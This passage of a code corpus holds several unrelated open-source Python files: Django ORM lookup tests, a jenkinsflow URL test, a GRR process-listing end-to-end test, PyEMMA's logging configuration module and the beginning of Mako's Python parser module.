{'id': self.a1.id, 'headline': 'Article 1'},
],
transform=identity
)
# You can use values() with iterator() for memory savings,
# because iterator() uses database-level iteration.
self.assertQuerysetEqual(
Article.objects.values('id', 'headline').iterator(),
[
{'headline': 'Article 5', 'id': self.a5.id},
{'headline': 'Article 6', 'id': self.a6.id},
{'headline': 'Article 4', 'id': self.a4.id},
{'headline': 'Article 2', 'id': self.a2.id},
{'headline': 'Article 3', 'id': self.a3.id},
{'headline': 'Article 7', 'id': self.a7.id},
{'headline': 'Article 1', 'id': self.a1.id},
],
transform=identity
)
# The values() method works with "extra" fields specified in extra(select).
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_one'),
[
{'id': self.a5.id, 'id_plus_one': self.a5.id + 1},
{'id': self.a6.id, 'id_plus_one': self.a6.id + 1},
{'id': self.a4.id, 'id_plus_one': self.a4.id + 1},
{'id': self.a2.id, 'id_plus_one': self.a2.id + 1},
{'id': self.a3.id, 'id_plus_one': self.a3.id + 1},
{'id': self.a7.id, 'id_plus_one': self.a7.id + 1},
{'id': self.a1.id, 'id_plus_one': self.a1.id + 1},
],
transform=identity
)
data = {
'id_plus_one': 'id+1',
'id_plus_two': 'id+2',
'id_plus_three': 'id+3',
'id_plus_four': 'id+4',
'id_plus_five': 'id+5',
'id_plus_six': 'id+6',
'id_plus_seven': 'id+7',
'id_plus_eight': 'id+8',
}
self.assertQuerysetEqual(
Article.objects.filter(id=self.a1.id).extra(select=data).values(*data.keys()),
[{
'id_plus_one': self.a1.id + 1,
'id_plus_two': self.a1.id + 2,
'id_plus_three': self.a1.id + 3,
'id_plus_four': self.a1.id + 4,
'id_plus_five': self.a1.id + 5,
'id_plus_six': self.a1.id + 6,
'id_plus_seven': self.a1.id + 7,
'id_plus_eight': self.a1.id + 8,
}], transform=identity
)
# You can specify fields from forward and reverse relations, just like filter().
self.assertQuerysetEqual(
Article.objects.values('headline', 'author__name'),
[
{'headline': self.a5.headline, 'author__name': self.au2.name},
{'headline': self.a6.headline, 'author__name': self.au2.name},
{'headline': self.a4.headline, 'author__name': self.au1.name},
{'headline': self.a2.headline, 'author__name': self.au1.name},
{'headline': self.a3.headline, 'author__name': self.au1.name},
{'headline': self.a7.headline, 'author__name': self.au2.name},
{'headline': self.a1.headline, 'author__name': self.au1.name},
], transform=identity
)
self.assertQuerysetEqual(
Author.objects.values('name', 'article__headline').order_by('name', 'article__headline'),
[
{'name': self.au1.name, 'article__headline': self.a1.headline},
{'name': self.au1.name, 'article__headline': self.a2.headline},
{'name': self.au1.name, 'article__headline': self.a3.headline},
{'name': self.au1.name, 'article__headline': self.a4.headline},
{'name': self.au2.name, 'article__headline': self.a5.headline},
{'name': self.au2.name, 'article__headline': self.a6.headline},
{'name': self.au2.name, 'article__headline': self.a7.headline},
], transform=identity
)
self.assertQuerysetEqual(
(
Author.objects
.values('name', 'article__headline', 'article__tag__name')
.order_by('name', 'article__headline', 'article__tag__name')
),
[
{'name': self.au1.name, 'article__headline': self.a1.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a2.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t2.name},
{'name': self.au1.name, 'article__headline': self.a4.headline, 'article__tag__name': self.t2.name},
{'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t2.name},
{'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t3.name},
{'name': self.au2.name, 'article__headline': self.a6.headline, 'article__tag__name': self.t3.name},
{'name': self.au2.name, 'article__headline': self.a7.headline, 'article__tag__name': self.t3.name},
], transform=identity
)
        # However, a FieldError will be raised if you specify a non-existent
        # field name in values() (a field that is neither in the model nor in
        # extra(select)).
with self.assertRaises(FieldError):
Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_two')
# If you don't specify field names to values(), all are returned.
self.assertQuerysetEqual(
Article.objects.filter(id=self.a5.id).values(),
[{
'id': self.a5.id,
'author_id': self.au2.id,
'headline': 'Article 5',
'pub_date': datetime(2005, 8, 1, 9, 0)
}],
transform=identity
)
def test_values_list(self):
# values_list() is similar to values(), except that the results are
# returned as a list of tuples, rather than a list of dictionaries.
# Within each tuple, the order of the elements is the same as the order
# of fields in the values_list() call.
def identity(x):
return x
self.assertQuerysetEqual(
Article.objects.values_list('headline'),
[
('Article 5',),
('Article 6',),
('Article 4',),
('Article 2',),
('Article 3',),
('Article 7',),
('Article 1',),
], transform=identity
)
self.assertQuerysetEqual(
Article.objects.values_list('id').order_by('id'),
[(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.values_list('id', flat=True).order_by('id'),
[self.a1.id, self.a2.id, self.a3.id, self.a4.id, self.a5.id, self.a6.id, self.a7.id],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id'),
[(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id_plus_one', 'id'),
[
(self.a1.id + 1, self.a1.id),
(self.a2.id + 1, self.a2.id),
(self.a3.id + 1, self.a3.id),
(self.a4.id + 1, self.a4.id),
(self.a5.id + 1, self.a5.id),
(self.a6.id + 1, self.a6.id),
(self.a7.id + 1, self.a7.id)
],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id', 'id_plus_one'),
[
(self.a1.id, self.a1.id + 1),
(self.a2.id, self.a2.id + 1),
(self.a3.id, self.a3.id + 1),
(self.a4.id, self.a4.id + 1),
(self.a5.id, self.a5.id + 1),
(self.a6.id, self.a6.id + 1),
(self.a7.id, self.a7.id + 1)
],
transform=identity
)
args = ('name', 'article__headline', 'article__tag__name')
self.assertQuerysetEqual(
Author.objects.values_list(*args).order_by(*args),
[
(self.au1.name, self.a1.headline, self.t1.name),
(self.au1.name, self.a2.headline, self.t1.name),
(self.au1.name, self.a3.headline, self.t1.name),
(self.au1.name, self.a3.headline, self.t2.name),
(self.au1.name, self.a4.headline, self.t2.name),
(self.au2.name, self.a5.headline, self.t2.name),
(self.au2.name, self.a5.headline, self.t3.name),
(self.au2.name, self.a6.headline, self.t3.name),
(self.au2.name, self.a7.headline, self.t3.name),
], transform=identity
)
with self.assertRaises(TypeError):
Article.objects.values_list('id', 'headline', flat=True)
def test_get_next_previous_by(self):
# Every DateField and DateTimeField creates get_next_by_FOO() and
# get_previous_by_FOO() methods. In the case of identical date values,
# these methods will use the ID as a fallback check. This guarantees
# that no records are skipped or duplicated.
self.assertEqual(repr(self.a1.get_next_by_pub_date()), '<Article: Article 2>')
self.assertEqual(repr(self.a2.get_next_by_pub_date()), '<Article: Article 3>')
self.assertEqual(repr(self.a2.get_next_by_pub_date(headline__endswith='6')), '<Article: Article 6>')
self.assertEqual(repr(self.a3.get_next_by_pub_date()), '<Article: Article 7>')
self.assertEqual(repr(self.a4.get_next_by_pub_date()), '<Article: Article 6>')
with self.assertRaises(Article.DoesNotExist):
self.a5.get_next_by_pub_date()
self.assertEqual(repr(self.a6.get_next_by_pub_date()), '<Article: Article 5>')
self.assertEqual(repr(self.a7.get_next_by_pub_date()), '<Article: Article 4>')
self.assertEqual(repr(self.a7.get_previous_by_pub_date()), '<Article: Article 3>')
self.assertEqual(repr(self.a6.get_previous_by_pub_date()), '<Article: Article 4>')
self.assertEqual(repr(self.a5.get_previous_by_pub_date()), '<Article: Article 6>')
self.assertEqual(repr(self.a4.get_previous_by_pub_date()), '<Article: Article 7>')
self.assertEqual(repr(self.a3.get_previous_by_pub_date()), '<Article: Article 2>')
self.assertEqual(repr(self.a2.get_previous_by_pub_date()), '<Article: Article 1>')
def test_escaping(self):
# Underscores, percent signs and backslashes have special meaning in the
# underlying SQL code, but Django handles the quoting of them automatically.
Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20))
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article'),
[
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article_'),
['<Article: Article_ with underscore>']
)
Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21))
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article'),
[
'<Article: Article% with percent sign>',
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article%'),
['<Article: Article% with percent sign>']
)
Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22))
self.assertQuerysetEqual(
Article.objects.filter(headline__contains='\\'),
            ['<Article: Article with \\ backslash>']
)
def test_exclude(self):
Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20))
Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21))
Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22))
# exclude() is the opposite of filter() when doing lookups:
self.assertQuerysetEqual(
Article.objects.filter(headline__contains='Article').exclude(headline__contains='with'),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.exclude(headline__startswith="Article_"),
[
'<Article: Article with \\ backslash>',
'<Article: Article% with percent sign>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.exclude(headline="Article 7"),
[
'<Article: Article with \\ backslash>',
'<Article: Article% with percent sign>',
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 1>',
]
)
def test_none(self):
# none() returns a QuerySet that behaves like any other QuerySet object
self.assertQuerysetEqual(Article.objects.none(), [])
self.assertQuerysetEqual(Article.objects.none().filter(headline__startswith='Article'), [])
self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article').none(), [])
self.assertEqual(Article.objects.none().count(), 0)
self.assertEqual(Article.objects.none().update(headline="This should not take effect"), 0)
self.assertQuerysetEqual([article for article in Article.objects.none().iterator()], [])
def test_in(self):
# using __in with an empty list should return an empty query set
self.assertQuerysetEqual(Article.objects.filter(id__in=[]), [])
self.assertQuerysetEqual(
Article.objects.exclude(id__in=[]),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
def test_in_different_database(self):
with self.assertRaisesMessage(
ValueError,
"Subqueries aren't allowed across different databases. Force the "
"inner query to be evaluated using `list(inner_query)`."
):
list(Article.objects.filter(id__in=Article.objects.using('other').all()))
def test_error_messages(self):
# Programming errors are pointed out with nice error messages
with self.assertRaisesMessage(
FieldError,
"Cannot resolve keyword 'pub_date_year' into field. Choices are: "
"author, author_id, headline, id, pub_date, tag"
):
Article.objects.filter(pub_date_year='2005').count()
with self.assertRaisesMessage(
FieldError,
"Unsupported lookup 'starts' for CharField or join on the field "
"not permitted."
):
Article.objects.filter(headline__starts='Article')
def test_relation_nested_lookup_error(self):
# An invalid nested lookup on a related field raises a useful error.
msg = 'Related Field got invalid lookup: editor'
with self.assertRaisesMessage(FieldError, msg):
Article.objects.filter(author__editor__name='James')
def test_regex(self):
# Create some articles with a bit more interesting headlines for testing field lookups:
for a in Article.objects.all():
a.delete()
now = datetime.now()
Article.objects.create(pub_date=now, headline='f')
Article.objects.create(pub_date=now, headline='fo')
Article.objects.create(pub_date=now, headline='foo')
Article.objects.create(pub_date=now, headline='fooo')
Article.objects.create(pub_date=now, headline='hey-Foo')
Article.objects.create(pub_date=now, headline='bar')
Article.objects.create(pub_date=now, headline='AbBa')
Article.objects.create(pub_date=now, headline='baz')
Article.objects.create(pub_date=now, headline='baxZ')
# zero-or-more
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fo*'),
['<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>']
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'fo*'),
[
'<Article: f>',
'<Article: fo>',
'<Article: foo>',
'<Article: fooo>',
'<Article: hey-Foo>',
]
)
# one-or-more
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fo+'),
['<Article: fo>', '<Article: foo>', '<Article: fooo>']
)
# wildcard
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'fooo?'),
['<Article: foo>', '<Article: fooo>']
)
# leading anchor
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'^b'),
['<Article: bar>', '<Article: baxZ>', '<Article: baz>']
)
self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'^a'), ['<Article: AbBa>'])
# trailing anchor
self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'z$'), ['<Article: baz>'])
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'z$'),
['<Article: baxZ>', '<Article: baz>']
)
# character sets
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'ba[rz]'),
['<Article: bar>', '<Article: baz>']
)
self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba.[RxZ]'), ['<Article: baxZ>'])
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'ba[RxZ]'),
['<Article: bar>', '<Article: baxZ>', '<Article: baz>']
)
# and more articles:
Article.objects.create(pub_date=now, headline='foobar')
Article.objects.create(pub_date=now, headline='foobaz')
Article.objects.create(pub_date=now, headline='ooF')
Article.objects.create(pub_date=now, headline='foobarbaz')
Article.objects.create(pub_date=now, headline='zoocarfaz')
Article.objects.create(pub_date=now, headline='barfoobaz')
Article.objects.create(pub_date=now, headline='bazbaRFOO')
# alternation
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'oo(f|b)'),
[
'<Article: barfoobaz>',
'<Article: foobar>',
'<Article: foobarbaz>',
'<Article: foobaz>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'oo(f|b)'),
[
'<Article: barfoobaz>',
'<Article: foobar>',
'<Article: foobarbaz>',
'<Article: foobaz>',
'<Article: ooF>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'^foo(f|b)'),
['<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>']
)
# greedy matching
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'b.*az'),
[
'<Article: barfoobaz>',
'<Article: baz>',
'<Article: bazbaRFOO>',
'<Article: foobarbaz>',
'<Article: foobaz>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iregex=r'b.*ar'),
[
'<Article: bar>',
'<Article: barfoobaz>',
'<Article: bazbaRFOO>',
'<Article: foobar>',
'<Article: foobarbaz>',
]
)
@skipUnlessDBFeature('supports_regex_backreferencing')
def test_regex_backreferencing(self):
# grouping and backreferences
now = datetime.now()
Article.objects.create(pub_date=now, headline='foobar')
Article.objects.create(pub_date=now, headline='foobaz')
Article.objects.create(pub_date=now, headline='ooF')
Article.objects.create(pub_date=now, headline='foobarbaz')
Article.objects.create(pub_date=now, headline='zoocarfaz')
Article.objects.create(pub_date=now, headline='barfoobaz')
Article.objects.create(pub_date=now, headline='bazbaRFOO')
self.assertQuerysetEqual(
Article.objects.filter(headline__regex=r'b(.).*b\1'),
['<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>']
)
def test_regex_null(self):
"""
Ensure that a regex lookup does not fail on null/None values
"""
Season.objects.create(year=2012, gt=None)
self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^$'), [])
def test_regex_non_string(self):
"""
Ensure that a regex lookup does not fail on non-string fields
"""
Season.objects.create(year=2013, gt=444)
self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^444$'), ['<Season: 2013>'])
def test_regex_non_ascii(self):
"""
Ensure that a regex lookup does not trip on non-ASCII characters.
"""
Player.objects.create(name='\u2660')
Player.objects.get(name__regex='\u2660')
def test_nonfield_lookups(self):
"""
Ensure that a lookup query containing non-fields raises the proper
exception.
"""
with self.assertRaises(FieldError):
Article.objects.filter(headline__blahblah=99)
with self.assertRaises(FieldError):
Article.objects.filter(headline__blahblah__exact=99)
with self.assertRaises(FieldError):
Article.objects.filter(blahblah=99)
def test_lookup_collision(self):
"""
Ensure that genuine field names don't collide with built-in lookup
types ('year', 'gt', 'range', 'in' etc.).
Refs #11670.
"""
# Here we're using 'gt' as a code number for the year, e.g. 111=>2009.
season_2009 = Season.objects.create(year=2009, gt=111)
season_2009.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2010 = Season.objects.create(year=2010, gt=222)
season_2010.games.create(home="Houston Astros", away="Chicago Cubs")
season_2010.games.create(home="Houston Astros", away="Milwaukee Brewers")
season_2010.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2011 = Season.objects.create(year=2011, gt=333)
season_2011.games.create(home="Houston Astros", away="St. Louis Cardinals")
season_2011.games.create(home="Houston Astros", away="Milwaukee Brewers")
hunter_pence = Player.objects.create(name="Hunter Pence")
hunter_pence.games.set(Game.objects.filter(season__year__in=[2009, 2010]))
pudge = Player.objects.create(name="Ivan Rodriquez")
pudge.games.set(Game.objects.filter(season__year=2009))
pedro_feliz = Player.objects.create(name="Pedro Feliz")
pedro_feliz.games.set(Game.objects.filter(season__year__in=[2011]))
johnson = Player.objects.create(name="Johnson")
johnson.games.set(Game.objects.filter(season__year__in=[2011]))
# Games in 2010
self.assertEqual(Game.objects.filter(season__year=2010).count(), 3)
self.assertEqual(Game.objects.filter(season__year__exact=2010).count(), 3)
self.assertEqual(Game.objects.filter(season__gt=222).count(), 3)
self.assertEqual(Game.objects.filter(season__gt__exact=222).count(), 3)
# Games in 2011
self.assertEqual(Game.objects.filter(season__year=2011).count(), 2)
self.assertEqual(Game.objects.filter(season__year__exact=2011).count(), 2)
self.assertEqual(Game.objects.filter(season__gt=333).count(), 2)
self.assertEqual(Game.objects.filter(season__gt__exact=333).count(), 2)
self.assertEqual(Game.objects.filter(season__year__gt=2010).count(), 2)
self.assertEqual(Game.objects.filter(season__gt__gt=222).count(), 2)
# Games played in 2010 and 2011
self.assertEqual(Game.objects.filter(season__year__in=[2010, 2011]).count(), 5)
self.assertEqual(Game.objects.filter(season__year__gt=2009).count(), 5)
self.assertEqual(Game.objects.filter(season__gt__in=[222, 333]).count(), 5)
self.assertEqual(Game.objects.filter(season__gt__gt=111).count(), 5)
# Players who played in 2009
self.assertEqual(Player.objects.filter(games__season__year=2009).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__exact=2009).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt=111).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt__exact=111).distinct().count(), 2)
# Players who played in 2010
self.assertEqual(Player.objects.filter(games__season__year=2010).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__year__exact=2010).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__gt=222).distinct().count(), 1)
self.assertEqual(Player.objects.filter(games__season__gt__exact=222).distinct().count(), 1)
# Players who played in 2011
self.assertEqual(Player.objects.filter(games__season__year=2011).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__exact=2011).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt=333).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__year__gt=2010).distinct().count(), 2)
self.assertEqual(Player.objects.filter(games__season__gt__gt=222).distinct().count(), 2)
def test_chain_date_time_lookups(self):
self.assertQuerysetEqual(
Article.objects.filter(pub_date__month__gt=7),
['<Article: Article 5>', '<Article: Article 6>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__day__gte=27),
['<Article: Article 2>', '<Article: Article 3>',
'<Article: Article 4>', '<Article: Article 7>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__hour__lt=8),
['<Article: Article 1>', '<Article: Article 2>',
'<Article: Article 3>', '<Article: Article 4>',
'<Article: Article 7>'],
ordered=False
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__minute__lte=0),
['<Article: Article 1>', '<Article: Article 2>',
'<Article: Article 3>', '<Article: Article 4>',
'<Article: Article 5>', '<Article: Article 6>',
'<Article: Article 7>'],
ordered=False
)
class LookupTransactionTests(TransactionTestCase):
available_apps = ['lookup']
@ignore_warnings(category=RemovedInDjango20Warning)
@skipUnless(connection.vendor == 'mysql', 'requires MySQL')
def test_mysql_lookup_search(self):
        # To use fulltext indexes on MySQL, either version 5.6 or MyISAM tables are
        # needed. Neither of these is currently available on CI, so let's manually
        # create a MyISAM table for the Article model.
with connection.cursor() as cursor:
cursor.execute(
"CREATE TEMPORARY TABLE myisam_article ("
" id INTEGER PRIMARY KEY AUTO_INCREMENT, "
" headline VARCHAR(100) NOT NULL "
") ENGINE MYISAM")
dr = MyISAMArticle.objects.create(headline='Django Reinhardt')
MyISAMArticle.objects.create(headline='Ringo Star')
# NOTE: Needs to be created after the article has been saved.
cursor.execute(
'CREATE FULLTEXT INDEX myisam_article_ft ON myisam_article (headline)')
self.assertQuerysetEqual(
MyISAMArticle.objects.filter(headline__search='Reinhardt'),
[dr], lambda x: x)
|
lechat/jenkinsflow
|
refs/heads/master
|
test/direct_url_test.py
|
1
|
# Copyright (c) 2012 - 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from jenkinsflow.flow import serial
from .framework import api_select
def test_direct_url_is_public_url(api_type, capsys):
with api_select.api(__file__, api_type) as api:
api.job('j1', 0.01, max_fails=0, expect_invocations=1, expect_order=1, params=(('s1', 'Hi', 'desc'), ('c1', ('true', 'maybe', 'false'), 'desc')))
api.job('j2', 0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
with serial(api, timeout=40, job_name_prefix=api.job_name_prefix, report_interval=1, direct_url=api.public_uri) as ctrl:
ctrl.invoke('j1', s1='HELLO', c1=True)
ctrl.invoke('j2')
sout, _ = capsys.readouterr()
assert '//job' not in sout
assert '/job/' in sout
def test_direct_url_trailing_slash(api_type, capsys):
with api_select.api(__file__, api_type) as api:
api.job('j1', 0.01, max_fails=0, expect_invocations=1, expect_order=1, params=(('s1', 'Hi', 'desc'),))
api.job('j2', 0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
with serial(api, timeout=40, job_name_prefix=api.job_name_prefix, report_interval=1, direct_url=api.public_uri + '/') as ctrl:
ctrl.invoke('j1', s1='HELLO')
ctrl.invoke('j2')
sout, _ = capsys.readouterr()
assert '//job' not in sout
assert '/job/' in sout
|
darrenbilby/grr
|
refs/heads/master
|
endtoend_tests/processes.py
|
10
|
#!/usr/bin/env python
"""End to end tests for lib.flows.general.processes."""
from grr.endtoend_tests import base
from grr.lib import aff4
class TestProcessListing(base.AutomatedTest):
"""Test ListProcesses."""
platforms = ["Linux", "Windows", "Darwin"]
flow = "ListProcesses"
output_path = "analysis/ListProcesses/testing"
args = {"output": output_path}
def CheckFlow(self):
procs = aff4.FACTORY.Open(self.client_id.Add(self.output_path), mode="r",
token=self.token)
self.assertIsInstance(procs, aff4.RDFValueCollection)
process_list = list(procs)
# Make sure there are at least some results.
self.assertGreater(len(process_list), 5)
expected_name = self.GetGRRBinaryName()
for p in process_list:
if expected_name in p.exe:
return
self.fail("Process listing does not contain %s." % expected_name)
|
arokem/PyEMMA
|
refs/heads/devel
|
pyemma/util/log.py
|
2
|
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University
# Berlin, 14195 Berlin, Germany.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on 15.10.2013
@author: marscher
'''
__all__ = ['getLogger', 'enabled', 'CRITICAL', 'DEBUG', 'FATAL', 'INFO', 'NOTSET',
'WARN', 'WARNING']
import logging
reload(logging)
from logging import CRITICAL, FATAL, ERROR, WARNING, WARN, INFO, DEBUG, NOTSET
enabled = False
class dummyLogger(object):
""" set up a dummy logger if logging is disabled"""
def dummy(self, kwargs):
pass
def __getattr__(self, name):
return self.dummy
dummyInstance = None
def setupLogging():
"""
    parses the pyemma configuration file and configures logging from its conf_values
"""
global enabled, dummyInstance
from pyemma.util.config import conf_values
args = conf_values['Logging']
enabled = args.enabled == 'True'
toconsole = args.toconsole == 'True'
tofile = args.tofile == 'True'
if enabled:
try:
logging.basicConfig(level=args.level,
format=args.format,
datefmt='%d-%m-%y %H:%M:%S')
except IOError as ie:
import warnings
warnings.warn(
'logging could not be initialized, because of %s' % ie)
return
# in case we want to log to both file and stream, add a separate handler
formatter = logging.Formatter(args.format)
root_logger = logging.getLogger('')
root_handlers = root_logger.handlers
if toconsole:
ch = root_handlers[0]
ch.setLevel(args.level)
ch.setFormatter(formatter)
else: # remove first handler (which should be streamhandler)
assert len(root_handlers) == 1
streamhandler = root_handlers.pop()
assert isinstance(streamhandler, logging.StreamHandler)
if tofile:
# set delay to True, to prevent creation of empty log files
fh = logging.FileHandler(args.file, mode='a', delay=True)
fh.setFormatter(formatter)
fh.setLevel(args.level)
root_logger.addHandler(fh)
# if user enabled logging, but disallowed file and console logging, disable
# logging completely.
if not tofile and not toconsole:
enabled = False
dummyInstance = dummyLogger()
else:
dummyInstance = dummyLogger()
def getLogger(name=None):
if not enabled:
return dummyInstance
# if name is not given, return a logger with name of the calling module.
if not name:
import traceback
t = traceback.extract_stack(limit=2)
path = t[0][0]
pos = path.rfind('pyemma')
if pos == -1:
pos = path.rfind('scripts/')
name = path[pos:]
return logging.getLogger(name)
# init logging
setupLogging()
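# A minimal usage sketch (the logger name below is illustrative only):
# from pyemma.util.log import getLogger
# log = getLogger('pyemma.msm.estimation')
# log.info('goes to the console and/or file handlers configured above, if enabled')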
|
artdent/jgments
|
refs/heads/master
|
lib/Mako-0.3.4/mako/pyparser.py
|
21
|
# ast.py
# Copyright (C) Mako developers
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Handles parsing of Python code.
Parsing to AST is done via _ast on Python > 2.5, otherwise the compiler
module is used.
"""
from StringIO import StringIO
from mako import exceptions, util
import operator
if util.py3k:
# words that cannot be assigned to (notably
# smaller than the total keys in __builtins__)
reserved = set(['True', 'False', 'None', 'print'])
# the "id" attribute on a function node
arg_id = operator.attrgetter('arg')
else:
# words that cannot be assigned to (notably
# smaller than the total keys in __builtins__)
reserved = set(['True', 'False', 'None'])
# the "id" attribute on a function node
arg_id = operator.attrgetter('id')
try:
import _ast
util.restore__ast(_ast)
import _ast_util
except ImportError:
_ast = None
from compiler import parse as compiler_parse
from compiler import visitor
def parse(code, mode='exec', **exception_kwargs):
"""Parse an expression into AST"""
try:
if _ast:
return _ast_util.parse(code, '<unknown>', mode)
else:
if isinstance(code, unicode):
code = code.encode('ascii', 'backslashreplace')
return compiler_parse(code, mode)
except Exception, e:
raise exceptions.SyntaxException("(%s) %s (%s)" % (e.__class__.__name__, str(e), repr(code[0:50])), **exception_kwargs)
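# A minimal usage sketch of parse() (the expression below is illustrative only;
# exception_kwargs normally carries source/lineno/pos/filename for error reporting):
# expr_node = parse("x + y", mode='eval')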
if _ast:
class FindIdentifiers(_ast_util.NodeVisitor):
def __init__(self, listener, **exception_kwargs):
self.in_function = False
self.in_assign_targets = False
self.local_ident_stack = {}
self.listener = listener
self.exception_kwargs = exception_kwargs
def _add_declared(self, name):
if not self.in_function:
self.listener.declared_identifiers.add(name)
def visit_ClassDef(self, node):
self._add_declared(node.name)
def visit_Assign(self, node):
# flip around the visiting of Assign so the expression gets evaluated first,
